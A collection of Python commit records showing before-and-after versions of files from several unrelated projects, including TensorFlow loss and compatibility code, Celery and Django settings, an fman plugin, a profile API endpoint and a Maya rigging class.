if label_smoothing > 0:
num_classes = targets.shape[-1]
targets = targets * (1 - label_smoothing) + label_smoothing / num_classes
intersection = tf.reduce_sum(targets * predictions, axis=axis)
targets = tf.reduce_sum(targets, axis=axis)
predictions = tf.reduce_sum(predictions, axis=axis)
loss = -(2. * intersection + e) / (targets + predictions + e)
loss = tf.losses.compute_weighted_loss(loss, weights, scope, loss_collection, reduction)
return loss
| """ Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted values
Returns
-------
average loss : tf.Tensor with a single element
"""
e = 1e-6
intersection = flatten(targets * predictions)
loss = -tf.reduce_mean((2. * intersection + e) / (flatten(targets) + flatten(predictions) + e))
return loss
| Python | 0 |
4c9b47052c2c66671230f33ea84459e02b3b2f06 | Update Unit_Testing2.py | Unit_Testing2.py | Unit_Testing2.py | from unit_testing import *
import unittest
class UnitTests(unittest.TestCase):
def setUp(self):
print('setUp()...')
self.hash1 = Hash('1234')
self.email1 = Email('zmg@verizon.net')
def test(self):
print('testing hash...')
self.assertEqual(self.hash1, self.hash1) #failed
self.assertNotEqual(self.hash1, Hash('123'))
self.assertRaises(InvalidPassword, Hash, '1 ') #failed
#self.assertEqual(length of Hash for two different passwords)
print('testing email...')
self.assertEqual(str(self.email1), 'zmg@verizon.net')
self.assertRaises(InvalidEmail, Email, '@@') #failed
self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
print('testing social...')
self.assertRaises(InvalidSocial, SS, '123456789')
self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
self.assertRaises(InvalidSocial, SS, '-') #failed
self.assertRaises(InvalidSocial, SS, '1234-') #failed
def tearDown(self):
print('tearDown()...')
del self.hash1
del self.hash2
del self.hash3
del self.email1
| from unit_testing import *
import unittest
class UnitTests(unittest.TestCase):
def setUp(self):
print('setUp()...')
self.hash1 = Hash('1234')
self.hash2 = Hash('1234')
self.hash3 = Hash('123')
self.email1 = Email('P@V')
def test(self):
print('testing hash...')
self.assertEqual(self.hash1, self.hash2) #failed
self.assertNotEqual(self.hash1, self.hash3)
self.assertRaises(InvalidPassword, Hash, '1')
print('testing email...')
self.assertEqual(str(self.email1), 'P@V')
self.assertRaises(InvalidEmail, Email, 'thing')
self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
print('testing social...')
self.assertRaises(InvalidSocial, SS, '123456789')
self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
self.assertRaises(InvalidSocial, SS, '-') #failed
self.assertRaises(InvalidSocial, SS, '1234')
def tearDown(self):
print('tearDown()...')
del self.hash1
del self.hash2
del self.hash3
del self.email1
| Python | 0 |
4089730950d6005e257c20e6926000073fd41b33 | Enable Tensor equality for 2.0 | tensorflow/python/compat/v2_compat.py | tensorflow/python/compat/v2_compat.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
  """Enables TensorFlow 2.x behaviors.

  This function can be called at the beginning of the program (before `Tensors`,
  `Graphs` or other structures have been created, and before devices have been
  initialized). It switches all global behaviors that are different between
  TensorFlow 1.x and 2.x to behave as intended for 2.x.

  This function is called in the main TensorFlow `__init__.py` file; users
  should not need to call it, except during complex migrations.
  """
  # TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
  # 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
  # the modules below independently check if tf2.enabled().
  tf2.enable()
  ops.enable_eager_execution()
  tensor_shape.enable_v2_tensorshape()  # Also switched by tf2
  variable_scope.enable_resource_variables()
  ops.enable_tensor_equality()
  # Enables TensorArrayV2 and control flow V2.
  control_flow_v2_toggles.enable_control_flow_v2()
@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
  """Disables TensorFlow 2.x behaviors.

  Call this at the very start of the program -- before any `Tensor`, `Graph`
  or device has been created or initialized -- to switch every global behavior
  that differs between TensorFlow 1.x and 2.x back to its 1.x form.

  Users can call this to disable 2.x behavior during complex migrations.
  """
  tf2.disable()
  ops.disable_eager_execution()
  tensor_shape.disable_v2_tensorshape()  # Also switched by tf2
  variable_scope.disable_resource_variables()
  ops.disable_tensor_equality()
  # Disables TensorArrayV2 and control flow V2.
  control_flow_v2_toggles.disable_control_flow_v2()
| # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
"""Enables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 2.x.
This function is called in the main TensorFlow `__init__.py` file, user should
not need to call it, except during complex migrations.
"""
# TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
# 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
# the modules below independently check if tf2.enabled().
tf2.enable()
ops.enable_eager_execution()
tensor_shape.enable_v2_tensorshape() # Also switched by tf2
variable_scope.enable_resource_variables()
# NOTE(review): this revision does not call ops.enable_tensor_equality();
# the commit recorded above ("Enable Tensor equality for 2.0") adds it.
# Enables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.enable_control_flow_v2()
@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
"""Disables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 1.x.
User can call this function to disable 2.x behavior during complex migrations.
"""
tf2.disable()
ops.disable_eager_execution()
tensor_shape.disable_v2_tensorshape() # Also switched by tf2
variable_scope.disable_resource_variables()
# NOTE(review): this revision does not call ops.disable_tensor_equality();
# the commit recorded above pairs it with enable_tensor_equality().
# Disables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.disable_control_flow_v2()
| Python | 0 |
e39c2e0c3dae39ee380a98a1aa662d14d1a1191e | Add new keyfile | dexter/config/celeryconfig.py | dexter/config/celeryconfig.py | from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
# 3600*12 seconds = 12 hours
'visibility_timeout': 3600*12,
}
# all our tasks can be retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
# Periodic (celerybeat) schedule.
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=2, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# NOTE(review): this "rerun" entry points at back_process_feeds, not
# fetch_yesterdays_feeds -- confirm that is intentional.
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=15, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
| from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
# 3600*12 seconds = 12 hours
'visibility_timeout': 3600*12,
}
# all our tasks can be retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
# Periodic (celerybeat) schedule.
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=1, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# NOTE(review): this "rerun" entry points at back_process_feeds, not
# fetch_yesterdays_feeds -- confirm that is intentional.
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=12, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
| Python | 0.000002 |
9a3d81d38e8b5885f54198f41b27d1d813c83e74 | Add django_extensions | director/director/settings.py | director/director/settings.py | """
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
# Project root: two directory levels up from this settings file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
SECRET_KEY = 'not-a-secret-key'
# Additional apps only used in development
# (django_extensions is deliberately kept out of the production config)
INSTALLED_APPS = Common.INSTALLED_APPS + [
'django_extensions'
]
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
| """
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
# Project root: two directory levels up from this settings file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
# The placeholder value below is intentionally not a real secret.
SECRET_KEY = 'not-a-secret-key'
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
| Python | 0.000005 |
c4f7f2025a6089ec0ddcb190eaf4c020804b384b | make the call to core commands more explicit | toggleselection/__init__.py | toggleselection/__init__.py | # Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneCommand, DirectoryPaneListener, load_json, save_json, PLATFORM
from core.commands.util import is_hidden
from fman.url import splitscheme
import json
from statusbarextended import StatusBarExtended
class _CorePaneCommand(DirectoryPaneCommand):
    """Verbatim copies of fman's core pane commands (core/commands/__init__.py).

    SelectionOverride looks these up by name with getattr() and invokes them
    directly, so each method simply forwards to the corresponding pane call.
    """

    def select_all(self):
        self.pane.select_all()

    def deselect(self):
        self.pane.clear_selection()

    def move_cursor_down(self, toggle_selection=False):
        self.pane.move_cursor_down(toggle_selection)

    def move_cursor_up(self, toggle_selection=False):
        self.pane.move_cursor_up(toggle_selection)

    def move_cursor_page_up(self, toggle_selection=False):
        self.pane.move_cursor_page_up(toggle_selection)

    def move_cursor_page_down(self, toggle_selection=False):
        self.pane.move_cursor_page_down(toggle_selection)

    def move_cursor_home(self, toggle_selection=False):
        self.pane.move_cursor_home(toggle_selection)

    def move_cursor_end(self, toggle_selection=False):
        self.pane.move_cursor_end(toggle_selection)
class CommandEmpty:
    """No-op command returned from on_command() in place of the original
    command name, so the intercepted command is not executed a second time
    (returning `'', args` makes fman hang)."""

    def __call__(self):
        return None
class SelectionOverride(DirectoryPaneListener):
# NOTE(review): on_command() below opens with a bare statement pair followed
# by `elif` -- the initial `if` condition is missing from this copy, making
# the method a syntax error as stored. Recover the first branch before use.
def on_command(self, command_name, args):
self.show_selected_files()
return 'command_empty', args
elif command_name in (
'select_all', 'deselect'):
# Run the copied core command, refresh the status bar, then swallow the
# original command by returning the no-op 'command_empty'.
getattr(_CorePaneCommand, command_name)(self)
self.show_selected_files()
return 'command_empty', args
elif command_name in ( # commands that can pass a 'toggle_selection' argument
'move_cursor_down' , 'move_cursor_up' ,
'move_cursor_page_down', 'move_cursor_page_up',
'move_cursor_home' , 'move_cursor_end'):
# NOTE(review): the whole `args` dict is passed positionally as the
# toggle_selection parameter of the copied core command -- confirm.
getattr(_CorePaneCommand, command_name)(self, args)
self.show_selected_files()
return 'command_empty', args
def show_selected_files(self):
# Refresh the extended status bar only when the StatusBarExtended plugin
# is enabled in its saved JSON settings.
statusBarExtendedEnabled = load_json('StatusBarExtended.json')
if statusBarExtendedEnabled:
statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
if statusBarExtendedEnabledJson['enabled'] == True:
StatusBarExtended.show_selected_files(self)
| # Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneListener, load_json
import json
from statusbarextended import StatusBarExtended
class CommandEmpty(): # to avoid duplicate command execution (and "return '', args" hangs)
# Returned from on_command() instead of the original command name; calling
# it does nothing, so the intercepted command runs only once.
def __call__(self):
pass
class SelectionOverride(DirectoryPaneListener):
    """Intercepts selection-changing commands so the extended status bar is
    refreshed immediately after the selection changes."""

    def on_command(self, command_name, args):
        # BUG FIX: the original used `command_name in ('select_all')` and
        # `in ('deselect')`. Without a trailing comma those parentheses hold a
        # *string*, so `in` performed a substring test (e.g. 'select' matched
        # 'select_all'). Compare for equality instead.
        if command_name == 'select_all':  # def ^A
            self.pane.select_all()
            self.show_selected_files()
            return 'command_empty', args
        elif command_name == 'deselect':  # def ^D
            self.pane.clear_selection()
            self.show_selected_files()
            return 'command_empty', args
        elif command_name in (  # commands that can pass a 'toggle_selection' argument
                'move_cursor_down', 'move_cursor_up',
                'move_cursor_page_down', 'move_cursor_page_up',
                'move_cursor_home', 'move_cursor_end'):
            if args.get('toggle_selection'):  # select item -> update statusbar -> pass False arg
                file_under_cursor = self.pane.get_file_under_cursor()
                if file_under_cursor:
                    self.pane.toggle_selection(file_under_cursor)
                self.show_selected_files()
                new_args = dict(args)
                new_args['toggle_selection'] = False
                return command_name, new_args
        # Any other command falls through (implicit None): no override.

    def show_selected_files(self):
        # Refresh the extended status bar only when the StatusBarExtended
        # plugin is enabled in its saved JSON settings.
        statusBarExtendedEnabled = load_json('StatusBarExtended.json')
        if statusBarExtendedEnabled:
            statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
            if statusBarExtendedEnabledJson['enabled'] == True:
                StatusBarExtended.show_selected_files(self)
| Python | 0 |
50eedeaaa401d192c2681d58c83981961a1c4ff1 | fix update profile | lxxl/services/graph/users/profile.py | lxxl/services/graph/users/profile.py | from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
"""HTTP resource for a user's profile: get() reads it, set() upserts it."""
def get(self, environ, params):
# Return the stored profile data plus account fields for params['uid'].
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
# output.error() appears to raise Error (caught below) -- verify.
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
# Make sure the 'uid' lookup index exists before querying.
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
# No stored profile yet: expose an empty data dict.
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
# Upsert the profile document with the JSON body of the request.
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getRequest().json
if not data:
output.error('bad json format', 400)
# NOTE(review): the document is saved under `me` (the token's uid),
# not params['uid'] -- confirm this asymmetry is intended.
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
| from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
"""HTTP resource for a user's profile: get() reads it, set() upserts it."""
def get(self, environ, params):
# Return the stored profile data plus account fields for params['uid'].
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
# Make sure the 'uid' lookup index exists before querying.
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
# Upsert the profile document with the posted JSON payload.
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getPostJson()
if not data:
output.error('bad json format', 400)
# NOTE(review): the document is saved under `me` (the token's uid),
# not params['uid'] -- confirm this asymmetry is intended.
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
| Python | 0.000001 |
9a4e2f88eba716ef607b8c476509cac5e58475f7 | Update mapper_lowercase.py | mapreduce/filter/mapper_lowercase.py | mapreduce/filter/mapper_lowercase.py | #!/usr/bin/env python
import sys
# Open just for read
# Two lookup sets built from the same label file: exact-case labels and a
# fully lowercased copy for case-insensitive matching.
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram.lower() in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
| #!/usr/bin/env python
import sys
# Open just for read
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
| Python | 0.000067 |
84ce27775b7e04955a15a0eb1e277db3e447b81f | fix SlidingCloth | mayaLib/rigLib/utils/slidingCloth.py | mayaLib/rigLib/utils/slidingCloth.py | __author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo, rigModelGrp=None):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
:param rigModelGrp: str, optional group to parent the wrap base object under
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
# NOTE(review): only a message is printed here; the attributes stay
# unset and the code below will raise AttributeError.
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo)
baseObj = pm.listConnections(wrapDeformer.basePoints, source=True)[0]
if rigModelGrp:
pm.parent(baseObj, rigModelGrp)
# save attribute
self.baseObj = baseObj
def getWrapBaseObj(self):
return self.baseObj | __author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
# NOTE(review): only a message is printed here; the attributes stay
# unset and the code below will raise AttributeError.
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo) | Python | 0.000001 |
